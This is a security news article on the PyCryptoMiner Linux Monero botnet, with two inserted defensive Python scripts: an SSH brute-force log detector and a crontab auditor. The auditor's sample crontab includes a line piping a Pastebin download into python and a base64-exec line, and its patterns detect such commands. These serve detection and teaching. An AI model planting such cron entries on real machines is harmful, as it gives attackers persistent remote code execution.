PyCryptoMiner Targets Linux Machines to Mine Monero


A Linux-based Monero miner botnet, dubbed PyCryptoMiner, has been discovered by security researchers. The botnet, which is built around a cryptocurrency miner, has earned cybercriminals at least 158 Monero, equivalent to $63,000.

PyCryptoMiner is written in Python, which has made it possible for the botnet's operators to keep it under the radar.

“Unlike a binary malware alternative, a scripting language-based malware is more evasive by nature as it can be easily obfuscated. It is also executed by a legitimate binary, which could be one of the PERL/Python/Bash/Go/PowerShell interpreters shipped with almost every Linux/Windows distribution,” researchers from F5 Networks said in their report.


PyCryptoMiner Technical Details

Whoever is operating this botnet is also using brute-force attacks against Linux systems with exposed SSH ports. If the password is guessed, the cybercriminals deploy Python scripts and install the Monero miner malware.

Researchers also believe that the cybercriminals are using an exploit for the JBoss server in their campaign, identified as CVE-2017-12149. However, brute-force attacks and the exploitation of SSH are also part of the cybercriminals' attack arsenal.
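The SSH password guessing described above leaves a recognisable trace in OpenSSH's auth.log: a burst of "Failed password" messages from one source address, sometimes followed by an "Accepted password" for the same address once a guess succeeds. The following detector is an added example written for this article; it is not code from the article, from F5's report, or from the botnet. The log lines, the source addresses and the thresholds are all constructed for the example.

```python
"""Flag SSH brute-force activity in OpenSSH auth.log lines.

Added example, not from the article or F5's report. It parses the standard
sshd "Failed password" / "Accepted password" messages, reports source
addresses that exceed a failure threshold inside a time window, and records
any successful password login that follows such a burst (guess, then deploy).
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Traditional syslog-style sshd lines (no year in the timestamp).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2"
)

# Constructed sample log: one guessing burst that ends in a successful
# root login, one legitimate user who mistyped once, one key-based login.
SAMPLE_LOG = """\
Jan  8 10:00:01 host sshd[1201]: Failed password for invalid user admin from 198.51.100.7 port 40100 ssh2
Jan  8 10:00:03 host sshd[1202]: Failed password for root from 198.51.100.7 port 40102 ssh2
Jan  8 10:00:05 host sshd[1203]: Failed password for invalid user test from 198.51.100.7 port 40104 ssh2
Jan  8 10:00:07 host sshd[1204]: Failed password for root from 198.51.100.7 port 40106 ssh2
Jan  8 10:00:09 host sshd[1205]: Failed password for root from 198.51.100.7 port 40108 ssh2
Jan  8 10:00:11 host sshd[1206]: Accepted password for root from 198.51.100.7 port 40110 ssh2
Jan  8 10:05:00 host sshd[1300]: Failed password for alice from 203.0.113.9 port 51000 ssh2
Jan  8 10:05:20 host sshd[1301]: Accepted password for alice from 203.0.113.9 port 51002 ssh2
Jan  8 10:06:00 host sshd[1302]: Accepted publickey for bob from 203.0.113.10 port 51004 ssh2
"""


def parse_line(line):
    """Return a dict (ts, result, user, ip) for a password auth line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    # Year is absent in this log format; strptime defaults to 1900, which
    # is fine for computing differences within one log file.
    d["ts"] = datetime.strptime(d["ts"], "%b %d %H:%M:%S")
    return d


def analyze(log_text, threshold=5, window_seconds=300):
    """Return flagged source IPs and successful logins that followed a burst."""
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(list)      # ip -> timestamps of recent failures
    brute_force = {}                  # ip -> failure count when flagged
    success_after_burst = []          # (ip, user) pairs worth investigating

    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        if ev["result"] == "Failed":
            recent = [t for t in failures[ip] if ts - t <= window]
            recent.append(ts)
            failures[ip] = recent
            if len(recent) >= threshold:
                brute_force[ip] = max(brute_force.get(ip, 0), len(recent))
        else:  # Accepted password
            if ip in brute_force and failures[ip] and ts - failures[ip][-1] <= window:
                success_after_burst.append((ip, ev["user"]))

    return {"brute_force": brute_force, "success_after_burst": success_after_burst}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip, n in result["brute_force"].items():
        print(f"brute force from {ip}: {n} failures in window")
    for ip, user in result["success_after_burst"]:
        print(f"password login for {user!r} from {ip} right after a guessing burst")
```

The threshold and window are deliberately small so the constructed sample trips them; on a real host they should be tuned to the normal failure rate, and key-only authentication (which this parser ignores on purpose) removes the attack surface entirely.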

What is interesting is that the PyCryptoMiner botnet doesn't have hard-coded addresses for its command and control servers; it receives them from Pastebin posts. The botnet is also capable of acting as a scanner node, meaning that it scans the Internet for Linux machines with open SSH ports and attempts to guess the SSH logins. In case of success, the malware uses a simple base64-encoded spearhead Python script, which connects to the command and control server to execute more Python code, researchers said. The script itself is positioned in the main controller bot and is capable of the following activities:

  • Becoming persistent on the compromised machine by registering as a cron job (a time-based job scheduler in Unix-like operating systems);
  • Collecting details about the compromised machine, such as the number of CPUs;
  • Sending the collected information to the command and control server.
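Two of the traits listed above, persistence through a cron job and a base64-encoded Python spearhead script whose C2 address comes from Pastebin, can be checked for on a host by auditing crontab entries. The script below is an added example written for this article, not code from the article, from F5's report, or from the botnet. The crontab contents are constructed: the encoded payload decodes to a harmless print statement and the Pastebin URL is a placeholder, not a real post.

```python
"""Audit crontab entries for the persistence pattern described in the article.

Added example, not from the article or F5's report. It flags cron commands
that (a) hand a base64-decoded payload to an interpreter, (b) reference
pastebin.com, or (c) pipe downloaded content straight into an interpreter,
and it decodes any embedded base64 so an analyst can read the payload.
"""
import base64
import binascii
import re

# Constructed crontab. Line 3 decodes to print('hello'); the Pastebin
# path "EXAMPLEID" is a placeholder and does not point anywhere.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/10 * * * * python -c "import base64;exec(base64.b64decode('cHJpbnQoJ2hlbGxvJyk='))"
@reboot curl -s https://pastebin.com/raw/EXAMPLEID | python
30 2 * * 0 /usr/local/bin/backup.sh
"""

INTERPRETER = r"(?:python[\d.]*|perl|ruby|sh|bash)"
DECODED_PAYLOAD_RE = re.compile(
    rf"\b{INTERPRETER}\b.*(?:b64decode|base64\s+(?:-d|--decode))"
)
PIPE_TO_INTERPRETER_RE = re.compile(rf"\|\s*{INTERPRETER}\b")
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def parse_crontab(text):
    """Yield (schedule, command) pairs, skipping comments and blank lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue  # comment, blank, or VAR=value assignment
        if line.startswith("@"):
            parts = line.split(None, 1)
        else:
            parts = line.split(None, 5)
            if len(parts) == 6:
                parts = [" ".join(parts[:5]), parts[5]]
        if len(parts) == 2:
            entries.append((parts[0], parts[1]))
    return entries


def decode_embedded_base64(command):
    """Return printable strings recovered from base64 tokens in the command."""
    decoded = []
    for token in B64_TOKEN_RE.findall(command):
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 (e.g. a URL path fragment)
        if raw and all(32 <= b < 127 or b in b"\n\t" for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded


def suspicious_reasons(command):
    """Return human-readable reasons a cron command looks like miner persistence."""
    reasons = []
    if DECODED_PAYLOAD_RE.search(command):
        reasons.append("interpreter executes a base64-decoded payload")
    if "pastebin.com" in command:
        reasons.append("references Pastebin, the C2 address source used by PyCryptoMiner")
    if PIPE_TO_INTERPRETER_RE.search(command):
        reasons.append("pipes downloaded content into an interpreter")
    return reasons


def audit_crontab(text):
    """Return a finding per suspicious entry: schedule, command, reasons, decoded payloads."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = suspicious_reasons(command)
        if reasons:
            findings.append({
                "schedule": schedule,
                "command": command,
                "reasons": reasons,
                "decoded": decode_embedded_base64(command),
            })
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{f['schedule']}] {f['command']}")
        for r in f["reasons"]:
            print("   -", r)
        for payload in f["decoded"]:
            print("   decoded:", payload)
```

On a real host, feed it the output of `crontab -l` for every user plus the files under /etc/cron.d; the decoded payload is shown rather than executed, so the audit itself never runs anything the attacker left behind.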

PyCryptoMiner Botnet Activity

Apparently, the botnet is currently inactive, as its servers are offline. Nevertheless, this doesn't mean that it won't be reactivated in new malicious crypto-mining campaigns. If the botnet operator updates the Pastebin posts to point to a new command and control server, the botnet can quickly be brought back online.

As already mentioned, the botnet is also designed to look for potential exploitation opportunities for CVE-2017-12149, a recently disclosed vulnerability. This means that vulnerable JBoss servers may be the next target of PyCryptoMiner.

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum since the start of the project. A professional with 10+ years of experience creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim


3 Comments
  1. Linux User

    This is hardly a malware. If you get access to the machine, you can do a lot of things other than just running a mining script.

    1. Vencislav Krustev

      Hello, yes, but it all comes down to who configured it. Some malware authors often aim to embed legitimate miners in malware applications and add other things that the malware does. These are functions that help it to propagate as well as self-update, copy itself and remain obfuscated.

    2. Martin Beltov

      As it is stated in the article, the miner is part of an extensive Python that is modular in nature. As a consequence the hacker operators can execute a variety of malware behaviour.

      Due to the recent rise of miners it is important for us to track all current events.
